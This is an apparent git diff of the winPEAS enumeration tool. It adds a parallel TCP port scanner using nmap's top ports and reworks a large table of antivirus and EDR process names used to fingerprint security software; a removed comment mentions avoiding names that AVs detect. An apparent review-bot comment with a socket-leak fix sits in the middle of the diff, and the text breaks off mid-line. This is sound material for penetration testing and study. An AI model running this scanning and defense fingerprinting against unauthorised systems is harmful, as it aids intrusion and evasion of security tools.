+ 9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,
+ 10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,
+ 14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,
+ 19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,
+ 32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,
+ 44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,
+ 50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,
+ 64623,64680,65000,65129,65389
+ };
+
+ #endregion
+
+ private struct TcpPortState
+ {
+ public TcpClient MainClient { get; set; }
+ public bool IsTcpPortOpen { get; set; }
+ }
+
+ IEnumerable portsToScan = nmapTop1000TCPPorts;
+
+ public PortScanner(IEnumerable ports)
+ {
+ if (ports != null)
+ {
+ portsToScan = ports;
+ }
+ }
+
+ public void Start(string host)
+ {
+ Parallel.ForEach(portsToScan, port =>
+ {
+ RunScanTcp(host, port);
+ });
+ }
+
+ public void RunScanTcp(string host, int port)
+ {
+ Thread.Sleep(1);
+
+ var newClient = new TcpClient();
+
+ var state = new TcpPortState
+ {
+ MainClient = newClient,
+ IsTcpPortOpen = true
+ };
+
+ IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state);
+ state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);
+
+ if (state.IsTcpPortOpen == false || newClient.Connected == false)
+ {
+ return;
+ }
+
+ Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
+ }
+
+
+ void AsyncCallback(IAsyncResult asyncResult)
+ {
+ var state = (TcpPortState)asyncResult.AsyncState;
+ TcpClient client = state.MainClient;
+
+ try
+ {
+ client.EndConnect(asyncResult);
+ }
+ catch
+ {
+ return;
+ }
+
+ if (client.Connected && state.IsTcpPortOpen)
+ {
+ return;
+ }
+
+ client.Close();
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs b/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
index c656c0c..6873d4b 100644
--- a/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
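Review bot: No path in RunScanTcp or AsyncCallback ever closes the TcpClient: the open-port branch returns after printing, the timeout branch returns while the connect is still pending, and in the callback `catch { return; }` skips `client.Close()` on a refused connection. The remaining `client.Close()` is effectively dead, because `TcpPortState` is a struct that was boxed at BeginConnect with `IsTcpPortOpen = true`, so the later assignment in RunScanTcp changes only the local copy and the callback's `client.Connected && state.IsTcpPortOpen` holds whenever EndConnect succeeded. Start() runs one TcpClient per port under Parallel.ForEach, and NetworkScanner nests that inside another Parallel.ForEach over hosts, so the leaked sockets accumulate until the finalizer reclaims them. Owning the client with a using block in RunScanTcp and passing the client itself as the async state closes it on every path (the struct can then be deleted); a connect still pending at disposal fails inside the callback, which the existing catch already swallows. The result line also goes through `Console.WriteLine` while NetworkScanner reports through Beaprint, so the two halves of the scanner print inconsistently.
```csharp
public void RunScanTcp(string host, int port)
{
    // … unchanged: Thread.Sleep(1) …
    using (var newClient = new TcpClient())
    {
        IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, newClient);
        bool completed = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);

        // Leaving the using block disposes the socket on every path (timeout, refused, open);
        // a connect still pending at that point fails inside AsyncCallback and is swallowed there.
        if (!completed || !newClient.Connected)
        {
            return;
        }

        Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
    }
}

void AsyncCallback(IAsyncResult asyncResult)
{
    var client = (TcpClient)asyncResult.AsyncState;
    try
    {
        client.EndConnect(asyncResult);
    }
    catch
    {
        // refused, timed out, or already disposed by RunScanTcp — nothing left to clean up here
    }
}
```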
@@ -4,664 +4,103 @@ namespace winPEAS.Info.ProcessInfo { static class DefensiveProcesses { - public static Dictionary Definitions = new Dictionary() + private static Dictionary> Definitions = new Dictionary>() { - {"mcshield.exe" , "McAfee AV"}, - {"windefend.exe" , "Windows Defender AV"}, - {"MSASCui.exe" , "Windows Defender AV"}, - {"MSASCuiL.exe" , "Windows Defender AV"}, - {"msmpeng.exe" , "Windows Defender AV"}, - {"msmpsvc.exe" , "Windows Defender AV"}, - {"WRSA.exe" , "WebRoot AV"}, - {"savservice.exe" , "Sophos AV"}, - {"TMCCSF.exe" , "Trend Micro AV"}, - {"symantec antivirus.exe" , "Symantec AV"}, - {"mbae.exe" , "MalwareBytes Anti-Exploit"}, - {"parity.exe" , "Bit9 application whitelisting"}, - {"cb.exe" , "Carbon Black behavioral analysis"}, - {"bds-vision.exe" , "BDS Vision behavioral analysis"}, - {"Triumfant.exe" , "Triumfant behavioral analysis"}, - {"CSFalcon.exe" , "CrowdStrike Falcon EDR"}, - {"ossec.exe" , "OSSEC intrusion detection"}, - {"TmPfw.exe" , "Trend Micro firewall"}, - {"dgagent.exe" , "Verdasys Digital Guardian DLP"}, - {"kvoop.exe" , " DLP process" }, - {"AAWTray.exe" , ""}, - {"ackwin32.exe" , ""}, - {"Ad-Aware.exe" , ""}, - {"adaware.exe" , ""}, - {"advxdwin.exe" , ""}, - {"agentsvr.exe" , ""}, - {"agentw.exe" , ""}, - {"alertsvc.exe" , ""}, - {"alevir.exe" , ""}, - {"alogserv.exe" , ""}, - {"amon9x.exe" , ""}, - {"anti-trojan.exe" , ""}, - {"antivirus.exe" , ""}, - {"ants.exe" , ""}, - {"apimonitor.exe" , ""}, - {"aplica32.exe" , ""}, - {"apvxdwin.exe" , ""}, - {"arr.exe" , ""}, - {"atcon.exe" , ""}, - {"atguard.exe" , ""}, - {"atro55en.exe" , ""}, - {"atupdater.exe" , ""}, - {"atwatch.exe" , ""}, - {"au.exe" , ""}, - {"aupdate.exe" , ""}, - {"auto-protect.nav80try.exe", ""}, - {"autodown.exe" , ""}, - {"autoruns.exe" , ""}, - {"autorunsc.exe" , ""}, - {"autotrace.exe" , ""}, - {"autoupdate.exe" , ""}, - {"avconsol.exe" , ""}, - {"ave32.exe" , ""}, - {"avgcc32.exe" , ""}, - {"avgctrl.exe" , ""}, - {"avgemc.exe" , ""}, - 
{"avgnt.exe" , ""}, - {"avgrsx.exe" , ""}, - {"avgserv.exe" , ""}, - {"avgserv9.exe" , ""}, - {"avguard.exe" , ""}, - {"avgwdsvc.exe" , ""}, - {"avgui.exe" , ""}, - {"avgw.exe" , ""}, - {"avkpop.exe" , ""}, - {"avkserv.exe" , ""}, - {"avkservice.exe" , ""}, - {"avkwctl9.exe" , ""}, - {"avltmain.exe" , ""}, - {"avnt.exe" , ""}, - {"avp.exe" , ""}, - {"avp32.exe" , ""}, - {"avpcc.exe" , ""}, - {"avpdos32.exe" , ""}, - {"avpm.exe" , ""}, - {"avptc32.exe" , ""}, - {"avpupd.exe" , ""}, - {"avsched32.exe" , ""}, - {"avsynmgr.exe" , ""}, - {"avwin.exe" , ""}, - {"avwin95.exe" , ""}, - {"avwinnt.exe" , ""}, - {"avwupd.exe" , ""}, - {"avwupd32.exe" , ""}, - {"avwupsrv.exe" , ""}, - {"avxmonitor9x.exe" , ""}, - {"avxmonitornt.exe" , ""}, - {"avxquar.exe" , ""}, - {"backweb.exe" , ""}, - {"bargains.exe" , ""}, - {"bd_professional.exe" , ""}, - {"beagle.exe" , ""}, - {"belt.exe" , ""}, - {"bidef.exe" , ""}, - {"bidserver.exe" , ""}, - {"bipcp.exe" , ""}, - {"bipcpevalsetup.exe" , ""}, - {"bisp.exe" , ""}, - {"blackd.exe" , ""}, - {"blackice.exe" , ""}, - {"blink.exe" , ""}, - {"blss.exe" , ""}, - {"bootconf.exe" , ""}, - {"bootwarn.exe" , ""}, - {"borg2.exe" , ""}, - {"bpc.exe" , ""}, - {"brasil.exe" , ""}, - {"bs120.exe" , ""}, - {"bundle.exe" , ""}, - {"bvt.exe" , ""}, - {"ccapp.exe" , ""}, - {"ccevtmgr.exe" , ""}, - {"ccpxysvc.exe" , ""}, - {"ccSvcHst.exe" , ""}, - {"cdp.exe" , ""}, - {"cfd.exe" , ""}, - {"cfgwiz.exe" , ""}, - {"cfiadmin.exe" , ""}, - {"cfiaudit.exe" , ""}, - {"cfinet.exe" , ""}, - {"cfinet32.exe" , ""}, - {"claw95.exe" , ""}, - {"claw95cf.exe" , ""}, - {"clean.exe" , ""}, - {"cleaner.exe" , ""}, - {"cleaner3.exe" , ""}, - {"cleanpc.exe" , ""}, - {"cleanup.exe" , ""}, - {"click.exe" , ""}, - {"cmdagent.exe" , ""}, - {"cmesys.exe" , ""}, - {"cmgrdian.exe" , ""}, - {"cmon016.exe" , ""}, - {"connectionmonitor.exe" , ""}, - {"cpd.exe" , ""}, - {"cpf9x206.exe" , ""}, - {"cpfnt206.exe" , ""}, - {"ctrl.exe" , ""}, - {"cv.exe" , ""}, - {"cwnb181.exe" , ""}, - 
{"cwntdwmo.exe" , ""}, - {"CylanceUI.exe" , ""}, - {"CyProtect.exe" , ""}, - {"CyUpdate.exe" , ""}, - {"cyserver.exe" , ""}, - {"cytray.exe" , ""}, - {"CyveraService.exe" , ""}, - {"datemanager.exe" , ""}, - {"dcomx.exe" , ""}, - {"defalert.exe" , ""}, - {"defscangui.exe" , ""}, - {"defwatch.exe" , ""}, - {"deputy.exe" , ""}, - {"divx.exe" , ""}, - {"dgprompt.exe" , ""}, - {"DgService.exe" , ""}, - {"dllcache.exe" , ""}, - {"dllreg.exe" , ""}, - {"doors.exe" , ""}, - {"dpf.exe" , ""}, - {"dpfsetup.exe" , ""}, - {"dpps2.exe" , ""}, - {"drwatson.exe" , ""}, - {"drweb32.exe" , ""}, - {"drwebupw.exe" , ""}, - {"dssagent.exe" , ""}, - {"dumpcap.exe" , ""}, - {"dvp95.exe" , ""}, - {"dvp95_0.exe" , ""}, - {"ecengine.exe" , ""}, - {"efpeadm.exe" , ""}, - {"egui.exe" , ""}, - {"ekrn.exe" , ""}, - {"emet_agent.exe" , ""}, - {"emet_service.exe" , ""}, - {"emsw.exe" , ""}, - {"engineserver.exe" , ""}, - {"ent.exe" , ""}, - {"esafe.exe" , ""}, - {"escanhnt.exe" , ""}, - {"escanv95.exe" , ""}, - {"espwatch.exe" , ""}, - {"ethereal.exe" , ""}, - {"etrustcipe.exe" , ""}, - {"evpn.exe" , ""}, - {"exantivirus-cnet.exe" , ""}, - {"exe.avxw.exe" , ""}, - {"expert.exe" , ""}, - {"explore.exe" , ""}, - {"f-agnt95.exe" , ""}, - {"f-prot.exe" , ""}, - {"f-prot95.exe" , ""}, - {"f-stopw.exe" , ""}, - {"fameh32.exe" , ""}, - {"fast.exe" , ""}, - {"fch32.exe" , ""}, - {"fcagswd.exe" , "McAfee DLP Agent"}, - {"fcags.exe" , "McAfee DLP Agent"}, - {"fih32.exe" , ""}, - {"findviru.exe" , ""}, - {"firesvc.exe" , "McAfee Host Intrusion Prevention"}, - {"firetray.exe" , ""}, - {"firewall.exe" , ""}, - {"fnrb32.exe" , ""}, - {"fp-win.exe" , ""}, - {"fp-win_trial.exe" , ""}, - {"fprot.exe" , ""}, - {"frameworkservice.exe" , ""}, - {"frminst.exe" , ""}, - {"frw.exe" , ""}, - {"fsaa.exe" , ""}, - {"fsav.exe" , ""}, - {"fsav32.exe" , ""}, - {"fsav530stbyb.exe" , ""}, - {"fsav530wtbyb.exe" , ""}, - {"fsav95.exe" , ""}, - {"fsgk32.exe" , ""}, - {"fsm32.exe" , ""}, - {"fsma32.exe" , ""}, - {"fsmb32.exe" , 
""}, - {"gator.exe" , ""}, - {"gbmenu.exe" , ""}, - {"gbpoll.exe" , ""}, - {"generics.exe" , ""}, - {"gmt.exe" , ""}, - {"guard.exe" , ""}, - {"guarddog.exe" , ""}, - {"hacktracersetup.exe" , ""}, - {"hbinst.exe" , ""}, - {"hbsrv.exe" , ""}, - {"HijackThis.exe" , ""}, - {"hipsvc.exe" , ""}, - {"HipMgmt.exe" , "McAfee Host Intrusion Protection"}, - {"hotactio.exe" , ""}, - {"hotpatch.exe" , ""}, - {"htlog.exe" , ""}, - {"htpatch.exe" , ""}, - {"hwpe.exe" , ""}, - {"hxdl.exe" , ""}, - {"hxiul.exe" , ""}, - {"iamapp.exe" , ""}, - {"iamserv.exe" , ""}, - {"iamstats.exe" , ""}, - {"ibmasn.exe" , ""}, - {"ibmavsp.exe" , ""}, - {"icload95.exe" , ""}, - {"icloadnt.exe" , ""}, - {"icmon.exe" , ""}, - {"icsupp95.exe" , ""}, - {"icsuppnt.exe" , ""}, - {"idle.exe" , ""}, - {"iedll.exe" , ""}, - {"iedriver.exe" , ""}, - {"iface.exe" , ""}, - {"ifw2000.exe" , ""}, - {"inetlnfo.exe" , ""}, - {"infus.exe" , ""}, - {"infwin.exe" , ""}, - {"init.exe" , ""}, - {"intdel.exe" , ""}, - {"intren.exe" , ""}, - {"iomon98.exe" , ""}, - {"istsvc.exe" , ""}, - {"jammer.exe" , ""}, - {"jdbgmrg.exe" , ""}, - {"jedi.exe" , ""}, - {"kavlite40eng.exe" , ""}, - {"kavpers40eng.exe" , ""}, - {"kavpf.exe" , ""}, - {"kazza.exe" , ""}, - {"keenvalue.exe" , ""}, - {"kerio-pf-213-en-win.exe" , ""}, - {"kerio-wrl-421-en-win.exe" , ""}, - {"kerio-wrp-421-en-win.exe" , ""}, - {"kernel32.exe" , ""}, - {"KeyPass.exe" , ""}, - {"killprocesssetup161.exe" , ""}, - {"launcher.exe" , ""}, - {"ldnetmon.exe" , ""}, - {"ldpro.exe" , ""}, - {"ldpromenu.exe" , ""}, - {"ldscan.exe" , ""}, - {"lnetinfo.exe" , ""}, - {"loader.exe" , ""}, - {"localnet.exe" , ""}, - {"lockdown.exe" , ""}, - {"lockdown2000.exe" , ""}, - {"lookout.exe" , ""}, - {"lordpe.exe" , ""}, - {"lsetup.exe" , ""}, - {"luall.exe" , ""}, - {"luau.exe" , ""}, - {"lucomserver.exe" , ""}, - {"luinit.exe" , ""}, - {"luspt.exe" , ""}, - {"mapisvc32.exe" , ""}, - {"masvc.exe" , "McAfee Agent"}, - {"mbamservice.exe" , ""}, - {"mcafeefire.exe" , ""}, - 
{"mcagent.exe" , ""}, - {"mcmnhdlr.exe" , ""}, - {"mcscript.exe" , ""}, - {"mcscript_inuse.exe" , ""}, - {"mctool.exe" , ""}, - {"mctray.exe" , ""}, - {"mcupdate.exe" , ""}, - {"mcvsrte.exe" , ""}, - {"mcvsshld.exe" , ""}, - {"md.exe" , ""}, - {"mfeann.exe" , "McAfee VirusScan Enterprise"}, - {"mfemactl.exe" , "McAfee VirusScan Enterprise"}, - {"mfevtps.exe" , ""}, - {"mfin32.exe" , ""}, - {"mfw2en.exe" , ""}, - {"mfweng3.02d30.exe" , ""}, - {"mgavrtcl.exe" , ""}, - {"mgavrte.exe" , ""}, - {"mghtml.exe" , ""}, - {"mgui.exe" , ""}, - {"minilog.exe" , ""}, - {"minionhost.exe" , ""}, - {"mmod.exe" , ""}, - {"monitor.exe" , ""}, - {"moolive.exe" , ""}, - {"mostat.exe" , ""}, - {"mpfagent.exe" , ""}, - {"mpfservice.exe" , ""}, - {"mpftray.exe" , ""}, - {"mrflux.exe" , ""}, - {"msapp.exe" , ""}, - {"msbb.exe" , ""}, - {"msblast.exe" , ""}, - {"mscache.exe" , ""}, - {"msccn32.exe" , ""}, - {"mscman.exe" , ""}, - {"msconfig.exe" , ""}, - {"msdm.exe" , ""}, - {"msdos.exe" , ""}, - {"msiexec16.exe" , ""}, - {"msinfo32.exe" , ""}, - {"mslaugh.exe" , ""}, - {"msmgt.exe" , ""}, - {"msmsgri32.exe" , ""}, - {"MsSense.exe" , "Microsoft Defender ATP"}, - {"mssmmc32.exe" , ""}, - {"mssys.exe" , ""}, - {"msvxd.exe" , ""}, - {"mu0311ad.exe" , ""}, - {"mwatch.exe" , ""}, - {"n32scanw.exe" , ""}, - {"naprdmgr.exe" , ""}, - {"nav.exe" , ""}, - {"navap.navapsvc.exe" , ""}, - {"navapsvc.exe" , ""}, - {"navapw32.exe" , ""}, - {"navdx.exe" , ""}, - {"navlu32.exe" , ""}, - {"navnt.exe" , ""}, - {"navstub.exe" , ""}, - {"navw32.exe" , ""}, - {"navwnt.exe" , ""}, - {"nc2000.exe" , ""}, - {"ncinst4.exe" , ""}, - {"ndd32.exe" , ""}, - {"neomonitor.exe" , ""}, - {"neowatchlog.exe" , ""}, - {"netarmor.exe" , ""}, - {"netd32.exe" , ""}, - {"netinfo.exe" , ""}, - {"netmon.exe" , ""}, - {"netscanpro.exe" , ""}, - {"netspyhunter-1.2.exe" , ""}, - {"netstat.exe" , ""}, - {"netutils.exe" , ""}, - {"nisserv.exe" , ""}, - {"nisum.exe" , ""}, - {"nmain.exe" , ""}, - {"nod32.exe" , ""}, - {"normist.exe" , 
""}, - {"norton_internet_secu_3.0_407.exe" , ""}, - {"notstart.exe" , ""}, - {"npf40_tw_98_nt_me_2k.exe" , ""}, - {"npfmessenger.exe" , ""}, - {"nprotect.exe" , ""}, - {"npscheck.exe" , ""}, - {"npssvc.exe" , ""}, - {"nsched32.exe" , ""}, - {"nssys32.exe" , ""}, - {"nstask32.exe" , ""}, - {"nsupdate.exe" , ""}, - {"nt.exe" , ""}, - {"ntrtscan.exe" , ""}, - {"ntvdm.exe" , ""}, - {"ntxconfig.exe" , ""}, - {"nui.exe" , ""}, - {"nupgrade.exe" , ""}, - {"nvarch16.exe" , ""}, - {"nvc95.exe" , ""}, - {"nvsvc32.exe" , ""}, - {"nwinst4.exe" , ""}, - {"nwservice.exe" , ""}, - {"nwtool16.exe" , ""}, - {"nxlog.exe" , ""}, - {"ollydbg.exe" , ""}, - {"onsrvr.exe" , ""}, - {"optimize.exe" , ""}, - {"ostronet.exe" , ""}, - {"osqueryd.exe" , ""}, - {"otfix.exe" , ""}, - {"outpost.exe" , ""}, - {"outpostinstall.exe" , ""}, - {"outpostproinstall.exe" , ""}, - {"padmin.exe" , ""}, - {"panixk.exe" , ""}, - {"patch.exe" , ""}, - {"pavcl.exe" , ""}, - {"pavproxy.exe" , ""}, - {"pavsched.exe" , ""}, - {"pavw.exe" , ""}, - {"pccwin98.exe" , ""}, - {"pcfwallicon.exe" , ""}, - {"pcip10117_0.exe" , ""}, - {"pcscan.exe" , ""}, - {"pdsetup.exe" , ""}, - {"periscope.exe" , ""}, - {"persfw.exe" , ""}, - {"perswf.exe" , ""}, - {"pf2.exe" , ""}, - {"pfwadmin.exe" , ""}, - {"pgmonitr.exe" , ""}, - {"pingscan.exe" , ""}, - {"platin.exe" , ""}, - {"pop3trap.exe" , ""}, - {"poproxy.exe" , ""}, - {"popscan.exe" , ""}, - {"portdetective.exe" , ""}, - {"portmonitor.exe" , ""}, - {"powerscan.exe" , ""}, - {"ppinupdt.exe" , ""}, - {"pptbc.exe" , ""}, - {"ppvstop.exe" , ""}, - {"prizesurfer.exe" , ""}, - {"prmt.exe" , ""}, - {"prmvr.exe" , ""}, - {"procdump.exe" , ""}, - {"processmonitor.exe" , ""}, - {"procexp.exe" , ""}, - {"procexp64.exe" , ""}, - {"procexplorerv1.0.exe" , ""}, - {"procmon.exe" , ""}, - {"programauditor.exe" , ""}, - {"proport.exe" , ""}, - {"protectx.exe" , ""}, - {"pspf.exe" , ""}, - {"purge.exe" , ""}, - {"qconsole.exe" , ""}, - {"qserver.exe" , ""}, - {"rapapp.exe" , ""}, - 
{"rav7.exe" , ""}, - {"rav7win.exe" , ""}, - {"rav8win32eng.exe" , ""}, - {"ray.exe" , ""}, - {"rb32.exe" , ""}, - {"rcsync.exe" , ""}, - {"realmon.exe" , ""}, - {"reged.exe" , ""}, - {"regedit.exe" , ""}, - {"regedt32.exe" , ""}, - {"rescue.exe" , ""}, - {"rescue32.exe" , ""}, - {"rrguard.exe" , ""}, - {"rtvscan.exe" , ""}, - {"rtvscn95.exe" , ""}, - {"rulaunch.exe" , ""}, - {"run32dll.exe" , ""}, - {"rundll.exe" , ""}, - {"rundll16.exe" , ""}, - {"ruxdll32.exe" , ""}, - {"safeweb.exe" , ""}, - {"sahagent.exescan32.exe" , ""}, - {"save.exe" , ""}, - {"savenow.exe" , ""}, - {"sbserv.exe" , ""}, - {"scam32.exe" , ""}, - {"scan32.exe" , ""}, - {"scan95.exe" , ""}, - {"scanpm.exe" , ""}, - {"scrscan.exe" , ""}, - {"SentinelOne.exe" , ""}, - {"serv95.exe" , ""}, - {"setupvameeval.exe" , ""}, - {"setup_flowprotector_us.exe", ""}, - {"sfc.exe" , ""}, - {"sgssfw32.exe" , ""}, - {"sh.exe" , ""}, - {"shellspyinstall.exe" , ""}, - {"shn.exe" , ""}, - {"showbehind.exe" , ""}, - {"shstat.exe" , "McAfee VirusScan Enterprise"}, - {"SISIDSService.exe" , ""}, - {"SISIPSUtil.exe" , ""}, - {"smc.exe" , ""}, - {"sms.exe" , ""}, - {"smss32.exe" , ""}, - {"soap.exe" , ""}, - {"sofi.exe" , ""}, - {"sperm.exe" , ""}, - {"splunk.exe" , "Splunk"}, - {"splunkd.exe" , "Splunk"}, - {"splunk-admon.exe" , "Splunk"}, - {"splunk-powershell.exe" , "Splunk"}, - {"splunk-winevtlog.exe" , "Splunk"}, - {"spf.exe" , ""}, - {"sphinx.exe" , ""}, - {"spoler.exe" , ""}, - {"spoolcv.exe" , ""}, - {"spoolsv32.exe" , ""}, - {"spyxx.exe" , ""}, - {"srexe.exe" , ""}, - {"srng.exe" , ""}, - {"ss3edit.exe" , ""}, - {"ssgrate.exe" , ""}, - {"ssg_4104.exe" , ""}, - {"st2.exe" , ""}, - {"start.exe" , ""}, - {"stcloader.exe" , ""}, - {"supftrl.exe" , ""}, - {"support.exe" , ""}, - {"supporter5.exe" , ""}, - {"svchostc.exe" , ""}, - {"svchosts.exe" , ""}, - {"sweep95.exe" , ""}, - {"sweepnet.sweepsrv.sys.swnetsup.exe", ""}, - {"symproxysvc.exe" , ""}, - {"symtray.exe" , ""}, - {"sysedit.exe" , ""}, - {"sysmon.exe" , 
"Sysinternals Sysmon"}, - {"sysupd.exe" , ""}, - {"TaniumClient.exe" , "Tanium"}, - {"taskmg.exe" , ""}, - {"taskmo.exe" , ""}, - {"taumon.exe" , ""}, - {"tbmon.exe" , ""}, - {"tbscan.exe" , ""}, - {"tc.exe" , ""}, - {"tca.exe" , ""}, - {"tcm.exe" , ""}, - {"tcpview.exe" , ""}, - {"tds-3.exe" , ""}, - {"tds2-98.exe" , ""}, - {"tds2-nt.exe" , ""}, - {"teekids.exe" , ""}, - {"tfak.exe" , ""}, - {"tfak5.exe" , ""}, - {"tgbob.exe" , ""}, - {"titanin.exe" , ""}, - {"titaninxp.exe" , ""}, - {"tlaservice.exe" , ""}, - {"tlaworker.exe" , ""}, - {"tracert.exe" , ""}, - {"trickler.exe" , ""}, - {"trjscan.exe" , ""}, - {"trjsetup.exe" , ""}, - {"trojantrap3.exe" , ""}, - {"tsadbot.exe" , ""}, - {"tshark.exe" , ""}, - {"tvmd.exe" , ""}, - {"tvtmd.exe" , ""}, - {"udaterui.exe" , ""}, - {"undoboot.exe" , ""}, - {"updat.exe" , ""}, - {"update.exe" , ""}, - {"updaterui.exe" , ""}, - {"upgrad.exe" , ""}, - {"utpost.exe" , ""}, - {"vbcmserv.exe" , ""}, - {"vbcons.exe" , ""}, - {"vbust.exe" , ""}, - {"vbwin9x.exe" , ""}, - {"vbwinntw.exe" , ""}, - {"vcsetup.exe" , ""}, - {"vet32.exe" , ""}, - {"vet95.exe" , ""}, - {"vettray.exe" , ""}, - {"vfsetup.exe" , ""}, - {"vir-help.exe" , ""}, - {"virusmdpersonalfirewall.exe", ""}, - {"vnlan300.exe" , ""}, - {"vnpc3000.exe" , ""}, - {"vpc32.exe" , ""}, - {"vpc42.exe" , ""}, - {"vpfw30s.exe" , ""}, - {"vptray.exe" , ""}, - {"vscan40.exe" , ""}, - {"vscenu6.02d30.exe" , ""}, - {"vsched.exe" , ""}, - {"vsecomr.exe" , ""}, - {"vshwin32.exe" , ""}, - {"vsisetup.exe" , ""}, - {"vsmain.exe" , ""}, - {"vsmon.exe" , ""}, - {"vsstat.exe" , ""}, - {"vstskmgr.exe" , "McAfee VirusScan Enterprise"}, - {"vswin9xe.exe" , ""}, - {"vswinntse.exe" , ""}, - {"vswinperse.exe" , ""}, - {"w32dsm89.exe" , ""}, - {"w9x.exe" , ""}, - {"watchdog.exe" , ""}, - {"webdav.exe" , ""}, - {"webscanx.exe" , ""}, - {"webtrap.exe" , ""}, - {"wfindv32.exe" , ""}, - {"whoswatchingme.exe" , ""}, - {"wimmun32.exe" , ""}, - {"win-bugsfix.exe" , ""}, - {"win32.exe" , ""}, - 
{"win32us.exe" , ""}, - {"winactive.exe" , ""}, - {"window.exe" , ""}, - {"windows.exe" , ""}, - {"wininetd.exe" , ""}, - {"wininitx.exe" , ""}, - {"winlogin.exe" , ""}, - {"winmain.exe" , ""}, - {"winnet.exe" , ""}, - {"winppr32.exe" , ""}, - {"winrecon.exe" , ""}, - {"winservn.exe" , ""}, - {"winssk32.exe" , ""}, - {"winstart.exe" , ""}, - {"winstart001.exe" , ""}, - {"wintsk32.exe" , ""}, - {"winupdate.exe" , ""}, - {"wireshark.exe" , ""}, - {"wkufind.exe" , ""}, - {"wnad.exe" , ""}, - {"wnt.exe" , ""}, - {"wradmin.exe" , ""}, - {"wrctrl.exe" , ""}, - {"wsbgate.exe" , ""}, - {"wupdater.exe" , ""}, - {"wupdt.exe" , ""}, - {"wyvernworksfirewall.exe" , ""}, - {"xagt.exe" , ""}, - {"xpf202en.exe" , ""}, - {"zapro.exe" , ""}, - {"zapsetup3001.exe" , ""}, - {"zatutor.exe" , ""}, - /*{"zonalm2601" , ""}, These names (ending in .exe) are detected by AVs - {"zonealarm" , ""}, - {"_avp32" , ""}, - {"_avpcc" , ""}, - {"rshell" , ""}, - {"_avpms" , ""}*/ + { "ALYac", new HashSet() { "alyac.exe", "aylaunch.exe", "asmsetup.exe", } }, + { "AVG Antivirus", new HashSet() { "avgui.exe", } }, + { "AVG", new HashSet() { "avgemc.exe", "afwserv.exe", "avgsvc.exe", "aswidsagent.exe", } }, + { "Ad-Aware Total Security by Lavasoft", new HashSet() { "ffcachetool.exe", "avktray.exe", "gdsc.exe", "bootcdwizard.exe", "avkservice.exe", "ask.exe", "avkwctlx64.exe", "gdfwadmin.exe", "avktuner.exe", "initinst.exe", "gdfwsvc.exe", "avk.exe", "avkwscpe.exe", "avkwctl.exe", "avktunerservice.exe", "mkisofs.exe", "gdfirewalltray.exe", "initinstx64.exe", "gdgadgetinst32.exe", "gdfwsvcx64.exe", "aawtray.exe", } }, + { "AhnLab-V3", new HashSet() { "aup80if.ex", "v3ui.exe", "v3medic.exe", "v3lite.exe", "v3l4cli.exe", } }, + { "Antiy-AVL", new HashSet() { "avl.exe", } }, + { "Arcabit", new HashSet() { "arcavir.exe", "arcaconfsv.exe", "arcabit.core.loggingservice.exe", "arcabit.core.configurator2.exe", "arcabit.exe", } }, + { "Avast Antivirus", new HashSet() { "avastui.exe", } }, + { "Avast", new 
HashSet() { "avast-antivirus.exe", "avastsvc.exe", "ashserv.exe", } }, + { "Avira", new HashSet() { "avira.webapphost.exe", } }, + { "Baidu", new HashSet() { "bav.exe", "bavcloud.exe", "bavhm.exe", "bavsvc.exe", "bavtray.exe", "bavupdater.exe", "bavbsreport.exe", } }, + { "BitDefender", new HashSet() { "epprotectedservice.exe", "epsecurityservice.exe", "epupdateservice.exe", "epupdateserver.exe", "bdagent.exe", } }, + { "Bkav Pro", new HashSet() { "bkavutil.exe", "bkav.exe", "bkavpro.exe", "bkavservice.exe", } }, + { "CMC", new HashSet() { "cmcpanel.exe", "cmccore.exe", "cmctrayicon.exe", } }, + { "Cisco", new HashSet() { "sfc.exe", } }, + { "ClamAV", new HashSet() { "clamscan.exe", "freshclam.exe", } }, + { "Comodo", new HashSet() { "cavwp.exe", "cfp.exe", } }, + { "CrowdStrike Falcon", new HashSet() { "falconsensorwinos.exe", } }, + { "Cybereason", new HashSet() { "cybereasonransomfreeservicehost.exe", } }, + { "Cylance", new HashSet() { "cylancesvc.exe", } }, + { "Cynet", new HashSet() { "cynet.exe", "cexplore.exe", "cynet.zerologondetector.exe", } }, + { "Cyradar", new HashSet() { "cyradarexecutorservices.exe", "cyradaredr.exe", "cyradares.exe", } }, + { "DrWeb", new HashSet() { "dwscancl.exe", "drwebsettingprocess.exe", "dwsysinfo.exe", "drwupsrv.exe", "dwnetfilter.exe", "dwscanner.exe", "dwservice.exe", "frwl_notify.exe", "frwl_svc.exe", "spideragent.exe", "spideragent_adm.exe", } }, + { "ESET-NOD32", new HashSet() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } }, + { "F-Secure", new HashSet() { "fsav32.exe", "fsdfwd.exe", "fsguiexe.exe", "fsav.exe", } }, + { "G Data AntiVirus", new 